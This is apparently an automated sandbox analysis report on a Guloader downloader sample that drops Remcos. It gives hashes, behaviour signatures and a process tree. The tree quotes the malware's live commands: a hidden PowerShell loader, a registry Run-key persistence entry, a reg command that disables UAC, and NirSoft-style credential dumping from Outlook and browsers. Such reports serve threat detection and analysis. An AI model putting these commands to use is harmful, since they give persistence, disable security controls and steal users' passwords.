Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-07-2024 11:16

General

  • Target
    MalwareBazaar.exe
  • Size
    401KB
  • MD5
    f1043033237fa935ef9af72415e657a1
  • SHA1
    b1ce2973b99811fe469ae6b4c450e97d4d4f4a20
  • SHA256
    a03913b0dcf4d9707eb9c74d69b522927e760e9be55effb0e14ebbbaad9177c7
  • SHA512
    1f4971262c297f2fa58234d7787ea384a168633eadce39e9334d9e7f5e5924b40eb47b84cc83ec8c29c62212863f17340a5525007d25f721c900e5583cf8dd3b
  • SSDEEP
    6144:FM23AboMfTvNXDQV1yKE2C7qNIZX8il32bcHXgjv3bO43f1WYq6cVjWZSlhhEV:nGoGNzQ+DZX8M2bc3Av3bO43tW5WZl

Malware Config

Signatures

  • Guloader, Cloudeye

    A shellcode-based downloader first seen in 2020.

  • UAC bypass 3 TTPs 1 IoCs
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with the display window hidden.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe
    "C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Vindflj=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp';$Byggryn=$Vindflj.SubString(71093,3);.$Byggryn($Vindflj)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1692
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%pantstnings% -windowstyle minimized $Uselessness=(Get-ItemProperty -Path 'HKCU:\Chet\').Ruelike;%pantstnings% ($Uselessness)"
            5⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:1776
        • C:\Windows\SysWOW64\cmd.exe
          /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2912
          • C:\Windows\SysWOW64\reg.exe
            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:5068
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eqvzfosugnwwqzscdxvnwhyeyf"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4948
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pkakggdouvojafgguiiozutvhmvho"
          4⤵
          • Accesses Microsoft Outlook accounts
          PID:208
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rmochzopidgodtcsdsvikznepafihxzbm"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2844
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4112,i,3409420486566309625,12100452682816721435,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8
    1⤵
    PID:1456

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize 144B
      MD5 4496987350b4a169bec8278ece79cb10
      SHA1 8ff5a04d767b629fd84994aea45f1220ff917e74
      SHA256 945ba0e98daefbf99b29b2c5f06e616bb3cc42d4b802e3111a7581a6acf5e821
      SHA512 61ee8b463e918b47fb1c4496cab11adecd72eeb49dfbd33a676ac694958a20edacf40d0846a575f223032ca1310c8cd8f2142a5dec17ecd5ff74c30a3a719ba4

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tuqy1ake.eew.ps1
      Filesize 60B
      MD5 d17fe0a3f47be24a6453e9ef58c94641
      SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
      SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
      SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\eqvzfosugnwwqzscdxvnwhyeyf
      Filesize 4KB
      MD5 be3be306ce816aa6030d9bfec1df34b0
      SHA1 66b10c4578245de0f78c445119e67f0bfb84bbf3
      SHA256 0c38ee44dc9eb4f240b667240c115fed88091bc04001d909b841ad8570738467
      SHA512 b9aee88755e6e239c7aa1d3c39488722786c1faa01de3c70cf822059f461ca277965b8dd50773e015444a83cc69b5f31c6379957de54a5073ef8799b26a12bcc

    • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Skyldsttendes.Und
      Filesize 350KB
      MD5 be381f7baf52513e52dfed9361a6dc69
      SHA1 a6cdb30ea1a85a42404e6e2fd29c8d5cc6ad251a
      SHA256 caceb5002866580c07883f8fddb62a82d7fadd1e8ca7a2eb4e11240dfda94d79
      SHA512 c076aa00785538010dcc9df6aaba0f8af5f130b7edc800fca31da4fff9ee11fa728ba5c78c89047494b0536878d8b32d3f05f43177dacf0416726b02af814c8a

    • C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\delysten.imp
      Filesize 69KB
      MD5 8172795f7c8cfb7cc597e879d2b0b468
      SHA1 811797a9309a1bc3429f3bc7735eb6af1a7c80dc
      SHA256 5339721e47b9ac3dfb81b6d81593e9792c57573541918c0d5ca327128aa4345c
      SHA512 9718f72091367ed6a02598295a9f35512c6ddb31e3dae9b685060e613c942c755d90418cb4ea31e4bf7ea8967ce34c9356bbf53fafe08a31d851afddd55d7322

    • memory/208-70-0x0000000000400000-0x0000000000462000-memory.dmp (Filesize 392KB)
    • memory/208-72-0x0000000000400000-0x0000000000462000-memory.dmp (Filesize 392KB)
    • memory/208-66-0x0000000000400000-0x0000000000462000-memory.dmp (Filesize 392KB)
    • memory/2844-69-0x0000000000400000-0x0000000000424000-memory.dmp (Filesize 144KB)
    • memory/2844-73-0x0000000000400000-0x0000000000424000-memory.dmp (Filesize 144KB)
    • memory/2844-67-0x0000000000400000-0x0000000000424000-memory.dmp (Filesize 144KB)
    • memory/2952-40-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-47-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-30-0x0000000005FA0000-0x0000000005FBA000-memory.dmp (Filesize 104KB)
    • memory/2952-31-0x0000000006090000-0x00000000060B2000-memory.dmp (Filesize 136KB)
    • memory/2952-32-0x0000000007260000-0x0000000007804000-memory.dmp (Filesize 5.6MB)
    • memory/2952-28-0x0000000005B20000-0x0000000005B6C000-memory.dmp (Filesize 304KB)
    • memory/2952-34-0x0000000007E90000-0x000000000850A000-memory.dmp (Filesize 6.5MB)
    • memory/2952-36-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-37-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-38-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-27-0x0000000005A80000-0x0000000005A9E000-memory.dmp (Filesize 120KB)
    • memory/2952-9-0x000000007432E000-0x000000007432F000-memory.dmp (Filesize 4KB)
    • memory/2952-42-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-41-0x0000000008510000-0x000000000AD4F000-memory.dmp (Filesize 40.2MB)
    • memory/2952-43-0x000000007432E000-0x000000007432F000-memory.dmp (Filesize 4KB)
    • memory/2952-45-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-46-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-29-0x0000000005FF0000-0x0000000006086000-memory.dmp (Filesize 600KB)
    • memory/2952-10-0x00000000021D0000-0x0000000002206000-memory.dmp (Filesize 216KB)
    • memory/2952-11-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/2952-26-0x0000000005490000-0x00000000057E4000-memory.dmp (Filesize 3.3MB)
    • memory/2952-15-0x0000000004C90000-0x0000000004CF6000-memory.dmp (Filesize 408KB)
    • memory/2952-12-0x0000000004DF0000-0x0000000005418000-memory.dmp (Filesize 6.2MB)
    • memory/2952-16-0x0000000005420000-0x0000000005486000-memory.dmp (Filesize 408KB)
    • memory/2952-14-0x0000000004AF0000-0x0000000004B12000-memory.dmp (Filesize 136KB)
    • memory/2952-13-0x0000000074320000-0x0000000074AD0000-memory.dmp (Filesize 7.7MB)
    • memory/3188-85-0x0000000020740000-0x0000000020759000-memory.dmp (Filesize 100KB)
    • memory/3188-89-0x0000000020740000-0x0000000020759000-memory.dmp (Filesize 100KB)
    • memory/3188-88-0x0000000020740000-0x0000000020759000-memory.dmp (Filesize 100KB)
    • memory/3188-60-0x0000000001DC0000-0x00000000045FF000-memory.dmp (Filesize 40.2MB)
    • memory/4948-71-0x0000000000400000-0x0000000000478000-memory.dmp (Filesize 480KB)
    • memory/4948-68-0x0000000000400000-0x0000000000478000-memory.dmp (Filesize 480KB)
    • memory/4948-65-0x0000000000400000-0x0000000000478000-memory.dmp (Filesize 480KB)